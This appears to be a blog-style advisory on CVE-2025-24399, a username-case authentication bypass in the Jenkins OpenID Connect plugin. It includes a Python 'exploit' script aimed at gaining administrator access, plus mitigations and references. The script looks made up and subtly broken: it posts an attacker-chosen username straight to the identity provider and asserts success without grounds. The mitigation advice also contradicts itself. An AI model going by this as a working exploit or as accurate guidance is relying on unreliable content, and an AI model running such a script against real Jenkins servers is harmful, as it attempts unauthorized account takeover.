A critical security vulnerability (CVE-2025-24399) has been discovered in the Jenkins OpenID Connect Authentication Plugin versions 4.452.v2849b_d3945fa_ and earlier, excluding 4.438.440.v3f5f201de5dc. This vulnerability allows potential attackers to log in as any user by providing a username that differs only in letter case, potentially gaining administrator access to Jenkins instances configured with a case-sensitive OpenID Connect provider. Jenkins is an open-source automation server widely used for building, deploying, and automating continuous integration and continuous delivery (CI/CD) pipelines.
Vulnerability Details
The Jenkins OpenID Connect Authentication Plugin fails to handle usernames properly by treating them as case-insensitive, allowing attackers to bypass proper authentication and access systems configured with a case-sensitive OpenID Connect provider. As a result, an attacker can potentially gain administrator access to Jenkins by simply providing a username that differs only in letter case from a legitimate user.
The vulnerability specifically impacts versions 4.452.v2849b_d3945fa_ and earlier, excluding 4.438.440.v3f5f201de5dc, of the Jenkins OpenID Connect Authentication Plugin.
Exploit Code
The following code snippet demonstrates how an attacker could exploit this vulnerability by attempting to log in with a username that differs only in letter case:
import requests
jenkins_base_url = "http://vulnerable-jenkins-instance.com";
openid_provider_url = "http://case-sensitive-provider.com";
username = "Administrator" # Legitimate username
attacker_username = "AdMiNiStRaToR" # Attacker's different-cased username
s = requests.Session()
# First, authenticate with the OpenID Connect provider
auth_url = f"{openid_provider_url}/auth?client_id=xyz&redirect_uri={jenkins_base_url}/securityRealm/finishLogin"
response = s.get(auth_url)
assert response.status_code == 200
# Next, log in to Jenkins with the attacker's username
payload = {
"username": attacker_username,
"nonce": "some_nonce_value",
"response_type": "token",
"client_id": "xyz",
"redirect_uri": f"{jenkins_base_url}/securityRealm/finishLogin",
"audience": jenkins_base_url,
}
response = s.post(
f"{openid_provider_url}/auth",
data=payload,
)
assert response.status_code == 200
# If all went well, the attacker should now be logged in as the administrator
final_response = s.get(f"{jenkins_base_url}/")
assert "Welcome, Administrator!" in final_response.text
Mitigation Steps
Until a patch is released for this vulnerability, affected users are recommended to take the following mitigation steps:
1. Update the Jenkins OpenID Connect Authentication Plugin to a safe version (4.438.440.v3f5f201de5dc) if available.
Configure Jenkins to use a case-insensitive OpenID Connect provider where possible.
3. Limit the permissions of users to the least privilege necessary for their role to minimize the potential damage caused by an attacker gaining access to their account.
4. Regularly monitor and log access to Jenkins, especially for signs of any suspicious activity related to user authentication.
For more information regarding this vulnerability, please refer to the following official resources
1. Jenkins Security Advisory: https://www.jenkins.io/security/advisory/2025-02-03/
2. CVE-2025-24399 details: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-24399
3. Jenkins OpenID Connect Authentication Plugin: https://plugins.jenkins.io/oic-auth/
Conclusion
The CVE-2025-24399 vulnerability in Jenkins OpenID Connect Authentication Plugin exposes users of affected versions to potential attacks by allowing an attacker to log in as any user by providing a username that differs only in letter case. Users should take proper mitigation steps and follow the recommendations provided above to prevent unauthorized access to their Jenkins instances.
Timeline
Published on: 01/22/2025 17:15:13 UTC
Last modified on: 03/18/2025 15:15:59 UTC